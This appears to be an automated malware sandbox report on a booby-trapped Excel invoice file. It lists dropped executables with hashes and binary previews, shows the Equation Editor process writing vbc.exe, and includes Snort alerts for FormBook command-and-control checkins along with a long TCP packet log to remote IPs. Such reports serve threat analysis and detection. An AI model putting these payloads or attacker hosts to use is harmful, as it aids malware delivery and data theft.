                                                      Preview:....L..b..RKNb|..N%{..\.N%{..\.b|...\....b|...l..l..\.U......\..L..l..l..\.U......\..L..l..l..\.U......\..L..l..l..\.U.)....\%.L!bd..k.w.Mz%..\...\..L..\.b....\..T..\..T... ..w.H...\..L.....\.NK.|.b..w......b..|..l.H.l.G.l.M.l%.H.l.F.l.C..q.~]...~].Y.b..l..l.G.\....\..|............b...|.CF.\.FCJ....L..PP.N%{..\..\...\.r..\....T... .. ..L..\..\....T....\..L.....}...f.o....}......}{..f.E....K......}.I.f.S...........L..b...N%{..\..\.....\..\.bd..q..\.....\..\..\.].\....]....%q[.\..w.Hz.......Q...\..w.H .......Q..w.w.Mz%.....U}{..f.....U......\....\.U.l..W....\.bd..q.b|.....\......\.....L..b...N%{..\..\.....\%.\.bd..q..\.....\..\..\.].\.........%.a.....\..w.Hz.....%.Q.!.\..w.H .....%.Q.!.\..w.H.....%.Q.!.\...w.Gz.....%.Y.!.\..w.H .....%.Q.!w.w.Mz%....%U}...f.....U......\.bd..q..\..T......l..l..l..l..l.......\.bd..q.b|.....\......\.....L..b...\.....\..\.bd..q..\.....\..\..\.].\.........%q[.\..w.Hz.......Q...\..w.H .......Q..w.w.Mz%.....U}.I.f.....U......\....l..l.....

                                                      C:\Users\user\AppData\Local\Temp\l4nnhna3wvu7agf

                                                      Download File
                                                      Process:C:\Users\Public\vbc.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):175103
                                                      Entropy (8bit):7.987300968800779
                                                      Encrypted:false
                                                      SSDEEP:3072:Bj4fQd5wKwOPNwZmWzhCm2iGEOkdF3dpLvhYMDyYKGNqyoryYuhnMW2LkMVmHz8C:RngJOPNKm6hVGEXdFjLBlNqyF3hGVmTP
                                                      MD5:0B70240F412D375469A67F4E364E6EDD
                                                      SHA1:877D66CBFFF0712D91ED65C7545577729B34CB1A
                                                      SHA-256:DAAE8081EFFED8BB74D40479D2264D791A8539F1ED8565438640EE6681D5DC64
                                                      SHA-512:C6980E41D2EA0D85D5A586A32EC6142B301B7E03AC1871587BE5AC00FCA6CEA1680D62262A8656F1B1A4B428567B6BAEE0C05A35C07C8B9EA09594CB067B64C5
                                                      Malicious:false
                                                      Preview:^......&..(3x..^.....\5...x...{......e.d..y.q......2A.m..~..v.......R.v...f.....[..f...~o....)e.).X......w.....5...z.....E...........\.f_.=f..BYbIv.......M...a.J.Q..Ox..C.![~........o.J..4O.epp!.k.k..%B........alu.Q...w3.....pF-}..=..5........&.].x.*k~.'.....v....^p.{......e.d..y.q......2A.m..F~...uo..e.E.....e..zk>..pp(........uk.m..z.......+Pg....z.....d.Quw.....%......`.-.K[....1..Q....$E.tfp..q_-....C.]eE..m.>o.o.J..4O.eBR-"+.7Jk|B.......W.@lu.Q..v@3..|...pF[}.d=..5....f....&..Mx..k~.'....4A....^..{......e.d..y.q......2A.m..F~...uo..e.E.....e..zk>..pp(........uk.m..z.......+Pg....z.....d.Quw.....%......`.-.K[....1..Q....$E.tfp..q.Ox..C.X~....f..o.J..4O.eBR-"+.kJk%B.......W.@lu.Q..v@3..|...pF[}.d=..5....f....&..Mx..k~.'....4A....^..{......e.d..y.q......2A.m..F~...uo..e.E.....e..zk>..pp(........uk.m..z.......+Pg....z.....d.Quw.....%......`.-.K[....1..Q....$E.tfp..q.Ox..C.X~....f..o.J..4O.eBR-"+.kJk%B.......W.@lu.Q.

                                                      C:\Users\user\AppData\Local\Temp\nss8A2D.tmp

                                                      Download File
                                                      Process:C:\Users\Public\vbc.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):277368
                                                      Entropy (8bit):7.483346602419937
                                                      Encrypted:false
                                                      SSDEEP:6144:kngJOPNKm6hVGEXdFjLBlNqyF3hGVmTb+ecu:kngJOPjcVZBbF8/eB
                                                      MD5:C2F526011A8F4C1202583C0F68C272D7
                                                      SHA1:6E43958FE2A7B13C248C45369E6B4113185A1B78
                                                      SHA-256:E3AA52846C6BC0E920C12B442E4E08EDE1D409D0A99069A19BB801162204A38B
                                                      SHA-512:A1301004F25C78C69FA4BEE2261D2ABDEEAEFAA843EE27841EC41773B3C16597C58E066CDDF4C5F79FBBC964AC0164C77221E954D5FC168EC231C2366FEAEC07
                                                      Malicious:false
                                                      Preview:.@......,................"......$1.......@.......@..........................................................................................................................................................................................................................................G...............a...j...............................................................................................................................U.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\yldnat.exe

                                                      Download File
                                                      Process:C:\Users\Public\vbc.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):80384
                                                      Entropy (8bit):6.294551753702395
                                                      Encrypted:false
                                                      SSDEEP:1536:fGTaC+v1UYfr0oxAomP3cX/4pi2sWjcdl5I:Ua5eYD1/ui5lC
                                                      MD5:BC3C746DB1D3F8A821BBDF17CA023450
                                                      SHA1:12459C0EF96BDE1490B00FC9C6F09D69FBEC046F
                                                      SHA-256:C503A6FBE974E2C177FAFFFC2F2D9F7C26473909A2AB054E305B0E231C54B785
                                                      SHA-512:92A0EBED569EDE2306B15D12389110016FC45073BECA5BD3FF813BEDA7988A042D1827DDF8B985112C3D606AF378DEA952962CB601A85E0EAFA7D696EACCECF3
                                                      Malicious:true
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........w...w...w...%`..w...%^..w...%a.w......w...w..w..p....w..p.~..w..p....w..Rich.w..................PE..L...z&~b............................7.............@.......................................@..................................$.......p..................................T...............................@............................................text...U........................... ..`.rdata...N.......P..................@..@.data... 1...0......................@....rsrc........p.......*..............@..@.reloc...............,..............@..B................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\~DF8200AD3C92400B31.TMP

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:CDFV2 Encrypted
                                                      Category:dropped
                                                      Size (bytes):95744
                                                      Entropy (8bit):7.922070010958603
                                                      Encrypted:false
                                                      SSDEEP:1536:jh2xAtm2bfGDEZDovjNYbzrPyBSSRXSRR411fQGOadB0Lp1j4JjFSOEt8pRRZz:jh2PvWeYmBr4O1ppOIBMsJttzRZz
                                                      MD5:5B4A67AC532A5D8900B815144F0FB845
                                                      SHA1:6DA306004E084780E9F57F3702A5EC22E72FFF6C
                                                      SHA-256:98FC7157DAFDE651C3AB515663E3A91F034B49175E2E2495C00576C4B8E9E96D
                                                      SHA-512:031659B74D92911A76865B5095E75521E69E322838E8636E66E9E365B5BC5AC270F61B3C4B8831DD7D3E16A7318D4B5B3E4379AE6487E81F1FAA8BD9B988164D
                                                      Malicious:false
                                                      Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                      C:\Users\user\AppData\Local\Temp\~DFA02A15C6E61E2243.TMP

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):512
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3::
                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                      Malicious:false
                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\~DFB8C99282338AF6F8.TMP

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):512
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3::
                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                      Malicious:false
                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\~DFD268A41FBC2DE634.TMP

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):512
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3::
                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                      Malicious:false
                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\Desktop\~$DL03327INV.xlsx

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):165
                                                      Entropy (8bit):1.4377382811115937
                                                      Encrypted:false
                                                      SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                      MD5:797869BB881CFBCDAC2064F92B26E46F
                                                      SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                      SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                      SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                      Malicious:true
                                                      Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                      C:\Users\Public\vbc.exe

                                                      Download File
                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Category:dropped
                                                      Size (bytes):263772
                                                      Entropy (8bit):7.907718436240332
                                                      Encrypted:false
                                                      SSDEEP:6144:LOtIO4ysWjl1zKay/DGHe9G78x3c4mfnk1OUgS:LOLSepKvCH78xM4mQOY
                                                      MD5:DE76EF6A11A63EFC00B0303888BC0B7F
                                                      SHA1:7AB24456A49F6B61BC54D20A4D9C0B84F3AE696B
                                                      SHA-256:FC6EBE8BC215A292BB3DF340A84350CEB2BE7187EFC8E10381235CFA8D82F734
                                                      SHA-512:51A5CF0F640D922EC0D8BF5BA3FCC06B6278E3AC45F07190710C5055A23102A614443641D8B6617775D5A786CCB1E9D10404DFA0E146E6C8EC3481C616214D99
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 51%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....Oa.................h....:.....F6............@...........................;...........@...........................................;.P............................................................................................................text....g.......h.................. ..`.rdata...............l..............@..@.data.....9.........................@....ndata........:..........................rsrc...P.....;.....................@..@................................................................................................................................................................................................................................................................................................................................................

                                                      Static File Info

                                                      General

                                                      File type:CDFV2 Encrypted
                                                      Entropy (8bit):7.922070010958603
                                                      TrID:
                                                      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                      File name:DL03327INV.xlsx
                                                      File size:95744
                                                      MD5:5b4a67ac532a5d8900b815144f0fb845
                                                      SHA1:6da306004e084780e9f57f3702a5ec22e72fff6c
                                                      SHA256:98fc7157dafde651c3ab515663e3a91f034b49175e2e2495c00576c4b8e9e96d
                                                      SHA512:031659b74d92911a76865b5095e75521e69e322838e8636e66e9e365b5bc5ac270f61b3c4b8831dd7d3e16a7318d4b5b3e4379ae6487e81f1faa8bd9b988164d
                                                      SSDEEP:1536:jh2xAtm2bfGDEZDovjNYbzrPyBSSRXSRR411fQGOadB0Lp1j4JjFSOEt8pRRZz:jh2PvWeYmBr4O1ppOIBMsJttzRZz
                                                      TLSH:EB93F1C9C16498FDF4FEF67928986921F4686DF7D54497E0A226B00EC738A642BA0D31
                                                      File Content Preview:........................>......................................................................................................................................................................................................................................

                                                      File Icon

                                                      Icon Hash:e4e2aa8aa4b4bcb4

                                                      Network Behavior

                                                      Snort IDS Alerts

                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                      192.168.2.22198.54.117.21249175802031412 05/14/22-15:20:54.628198TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917580192.168.2.22198.54.117.212
                                                      192.168.2.22198.54.117.21249175802031453 05/14/22-15:20:54.628198TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917580192.168.2.22198.54.117.212
                                                      192.168.2.22198.54.117.21249175802031449 05/14/22-15:20:54.628198TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917580192.168.2.22198.54.117.212

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      May 14, 2022 15:19:31.412448883 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.526196957 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.526408911 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.529700994 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.645406961 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.645431042 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.645451069 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.645468950 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.645490885 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.645509005 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.645526886 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.645544052 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.645562887 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.645581961 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.645762920 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.691004992 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.759368896 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.759432077 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.759473085 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.759514093 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.759553909 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.759602070 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.759602070 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.759644032 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.759649038 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.759686947 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.759687901 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.759691954 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.759723902 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.759732008 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.759738922 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.759773016 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.759790897 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.759814024 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.759816885 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.759855986 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.759860992 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.759896040 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.759898901 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.759937048 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.759938002 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.759978056 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.766613007 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.873425007 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.873451948 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.873512030 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.873588085 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.873610973 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.873621941 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.873632908 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.873634100 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.873650074 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.873656034 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.873668909 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.873677969 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.873693943 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.873702049 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.873716116 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.873723984 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.873735905 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.873745918 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.873765945 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.873766899 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.873786926 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.873792887 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.873807907 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.873815060 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.873836040 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.873836994 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.873852015 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.873858929 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.873868942 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.873883009 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.873900890 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.873903036 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.873918056 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.873924971 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.873934031 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.873958111 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.873965979 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.873986006 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.873999119 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.874008894 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.874015093 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.874032021 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.874047041 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.874053955 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.874068022 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.874075890 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.874085903 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.874097109 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.874116898 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.874119043 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.874135971 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.874150038 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.874152899 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.874175072 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.874188900 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.874207973 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.880806923 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.987591982 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.987647057 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.987684965 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.987687111 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.987716913 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.987721920 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.987725973 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.987767935 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.987799883 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.987806082 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.987813950 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.987852097 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.987853050 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.987894058 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.987894058 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.987932920 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.987935066 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.987976074 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.987978935 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988013983 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988014936 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988054037 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988054991 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988095045 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988095045 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988133907 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988136053 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988173008 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988173008 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988214016 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988241911 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988284111 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988286018 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988327980 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988331079 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988370895 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988372087 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988410950 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988410950 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988449097 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988451004 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988508940 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988518953 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988560915 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988562107 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988605976 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988619089 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988645077 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988646984 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988687992 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988708019 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988725901 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988753080 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988760948 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988766909 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988806009 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.991838932 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994167089 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994213104 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994254112 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994281054 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994296074 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994312048 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994317055 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994335890 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994339943 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994378090 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994380951 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994419098 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994422913 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994463921 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994463921 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994503975 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994503975 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994541883 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994544983 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994585037 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994589090 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994625092 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994628906 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994668961 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994672060 CEST8049173104.168.33.31192.168.2.22
